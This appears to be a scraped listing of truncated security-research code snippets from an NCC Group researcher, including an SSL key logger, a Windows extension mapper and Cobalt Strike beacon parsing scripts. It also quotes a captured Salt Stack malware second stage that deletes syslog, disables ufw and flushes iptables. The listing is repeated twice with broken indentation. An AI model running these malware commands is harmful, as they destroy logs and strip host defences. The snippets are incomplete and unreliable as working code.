Ollie olliencc

## nccsslkeyandcertlog.c
//
// based on https://git.lekensteyn.nl/peter/wireshark-notes/tree/src/
// Licensed under the terms of GPLv3 (or any later version) at your choice
//
// works for daemons which can be run in the foreground
//
// gcc nccsslkeyandcertlog.c -shared -o nccsslkeyandcertlog.so -fPIC -ldl
//
//


## whodoineedtotrust.go
/*

 Understand which CAs you need to trust for the Alexa top million

 Released as open source by NCC Group Plc - http://www.nccgroup.trust/

 Developed by Ollie Whitehouse, ollie dot whitehouse at nccgroup dot trust

 Released under AGPL

## PEDumpHelpScanner.py
#
# Ollie Whitehouse
# ollie.whitehouse [@] nccgroup.com
#

import os
import pefile

rootdirs = [
           #"C:/Data/NCC/!Research/DUMPHELPER/test/t/"

## sendtoTeams.cs
using System;
using System.Net.Http;
using System.Runtime.CompilerServices;
using System.Text;
using System.Threading.Tasks;
using Newtonsoft.Json;
using MessageCardModel;
using System.Collections.Generic;
using System.IO;
using MessageCardModel.Actions;

## Salt Stack Second Stage from 217.12.210.192
/bin/sh
ulimit -n 65535
rm -rf /var/log/syslog
chattr -iua /tmp/
chattr -iua /var/tmp/
ufw disable
iptables -F
echo "nope" >/tmp/log_rot
sudo sysctl kernel.nmi_watchdog=0
echo '0' >/proc/sys/kernel/nmi_watchdog

## beacon-metadata.py
import M2Crypto
import requests

PRIVATE_KEY_TEMPLATE = "-----BEGIN PRIVATE KEY-----\n{}\n-----END PRIVATE KEY-----"
PUBLIC_KEY_TEMPLATE = "-----BEGIN PUBLIC KEY-----\n{}\n-----END PUBLIC KEY-----"

class Metadata(object):
    """
    Class to represent a beacon Metadata object
    """

## aes-parser.py
# NOTE: insert decryption functions

if __name__ == "__main__":
   SHARED_KEY = binascii.unhexlify("bca4caea1b3172aa979a5eac6c813184")
   HMAC_KEY = binascii.unhexlify("94b64efcf87b13c6828bcf14373bb2f9")
   with open(sys.argv[1], 'rb') as f:
       enc_data = f.read()
   encrypted_data, data_length = readInt(enc_data)
   print "Encrypted data should be: %d" % data_length
   signature = encrypted_data[-16:]

## beacon-rsa.py
import M2Crypto
import base64
import binascii
PUBKEY_TEMPLATE = "-----BEGIN PUBLIC KEY-----\n{}\n-----END PUBLIC KEY-----"
plaintext = "0000BEEF00000056D48A3A7104FC17544D5A3752C6EEAED4E404B5015FAD878000000A0000000431302E30093139322E3136382E3230302E313031094445534B544F502D3337325251544D0961646D696E0972756E646C6C33322E657865"
buf = M2Crypto.BIO.MemoryBuffer(PUBKEY_TEMPLATE.format('MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDhOfC4TICevrbgiUVK5kmvU8aNQNiCfccHxIOV4wzjOn5DpaC49NLoKMsS2fVnMI/f+cbyuqfrXMYmUX8eZDWkmflrBFNOPG8hr8oqhm1EiIvK9S+CsOuLGsEOmefqYk+Gj1nfnJ1uO9ELRv1U+OhmQ77w4u0AZWHPSNr1STYhZQIDAQAB'))
pubkey = M2Crypto.RSA.load_pub_key_bio(buf)
ciphertext = pubkey.public_encrypt(binascii.unhexlify(plaintext), M2Crypto.RSA.pkcs1_padding)
print (base64.b64encode(ciphertext))

## WindowsExtensionMap.bat
@echo off
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²°
REM °² Enumerates all files extensions                  ²°
REM °² and what opens them on Windows 10 in batch/cmd   ²°
REM °² twitter: @ollieatnccgroup                        ²°
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²°
for /f "tokens=1,2 delims==" %%G in ('assoc') do (
	echo Extension: %%G
	for /f "tokens=1,2 delims==" %%I in ('ftype %%H 2^> nul') do (
		echo Program: %%J

## WindowsExtensionMapCSV.bat
@echo off
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²°
REM °² Enumerates all files extensions                  ²°
REM °² and what opens them on Windows 10 in batch/cmd   ²°
REM °² twitter: @ollieatnccgroup                        ²°
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²°
for /f "tokens=1,2 delims==" %%G in ('assoc') do (
	for /f "tokens=1,2 delims==" %%I in ('ftype %%H 2^> nul') do (
		echo %COMPUTERNAME%,%%G,%%J
	)
	//
	// based on https://git.lekensteyn.nl/peter/wireshark-notes/tree/src/
	// Licensed under the terms of GPLv3 (or any later version) at your choice
	//
	// works for daemons which can be run in the foreground
	//
	// gcc nccsslkeyandcertlog.c -shared -o nccsslkeyandcertlog.so -fPIC -ldl
	//
	//
	/*

	Understand which CAs you need to trust for the Alexa top million

	Released as open source by NCC Group Plc - http://www.nccgroup.trust/

	Developed by Ollie Whitehouse, ollie dot whitehouse at nccgroup dot trust

	Released under AGPL
	#
	# Ollie Whitehouse
	# ollie.whitehouse [@] nccgroup.com
	#

	import os
	import pefile

	rootdirs = [
	#"C:/Data/NCC/!Research/DUMPHELPER/test/t/"
	using System;
	using System.Net.Http;
	using System.Runtime.CompilerServices;
	using System.Text;
	using System.Threading.Tasks;
	using Newtonsoft.Json;
	using MessageCardModel;
	using System.Collections.Generic;
	using System.IO;
	using MessageCardModel.Actions;
	/bin/sh
	ulimit -n 65535
	rm -rf /var/log/syslog
	chattr -iua /tmp/
	chattr -iua /var/tmp/
	ufw disable
	iptables -F
	echo "nope" >/tmp/log_rot
	sudo sysctl kernel.nmi_watchdog=0
	echo '0' >/proc/sys/kernel/nmi_watchdog
	import M2Crypto
	import requests

	PRIVATE_KEY_TEMPLATE = "-----BEGIN PRIVATE KEY-----\n{}\n-----END PRIVATE KEY-----"
	PUBLIC_KEY_TEMPLATE = "-----BEGIN PUBLIC KEY-----\n{}\n-----END PUBLIC KEY-----"

	class Metadata(object):
	"""
	Class to represent a beacon Metadata object
	"""
	# NOTE: insert decryption functions

	if __name__ == "__main__":
	SHARED_KEY = binascii.unhexlify("bca4caea1b3172aa979a5eac6c813184")
	HMAC_KEY = binascii.unhexlify("94b64efcf87b13c6828bcf14373bb2f9")
	with open(sys.argv[1], 'rb') as f:
	enc_data = f.read()
	encrypted_data, data_length = readInt(enc_data)
	print "Encrypted data should be: %d" % data_length
	signature = encrypted_data[-16:]
	import M2Crypto
	import base64
	import binascii
	PUBKEY_TEMPLATE = "-----BEGIN PUBLIC KEY-----\n{}\n-----END PUBLIC KEY-----"
	plaintext = "0000BEEF00000056D48A3A7104FC17544D5A3752C6EEAED4E404B5015FAD878000000A0000000431302E30093139322E3136382E3230302E313031094445534B544F502D3337325251544D0961646D696E0972756E646C6C33322E657865"
	buf = M2Crypto.BIO.MemoryBuffer(PUBKEY_TEMPLATE.format('MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDhOfC4TICevrbgiUVK5kmvU8aNQNiCfccHxIOV4wzjOn5DpaC49NLoKMsS2fVnMI/f+cbyuqfrXMYmUX8eZDWkmflrBFNOPG8hr8oqhm1EiIvK9S+CsOuLGsEOmefqYk+Gj1nfnJ1uO9ELRv1U+OhmQ77w4u0AZWHPSNr1STYhZQIDAQAB'))
	pubkey = M2Crypto.RSA.load_pub_key_bio(buf)
	ciphertext = pubkey.public_encrypt(binascii.unhexlify(plaintext), M2Crypto.RSA.pkcs1_padding)
	print (base64.b64encode(ciphertext))
	@echo off
	REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²°
	REM °² Enumerates all files extensions ²°
	REM °² and what opens them on Windows 10 in batch/cmd ²°
	REM °² twitter: @ollieatnccgroup ²°
	REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²°
	for /f "tokens=1,2 delims==" %%G in ('assoc') do (
	echo Extension: %%G
	for /f "tokens=1,2 delims==" %%I in ('ftype %%H 2^> nul') do (
	echo Program: %%J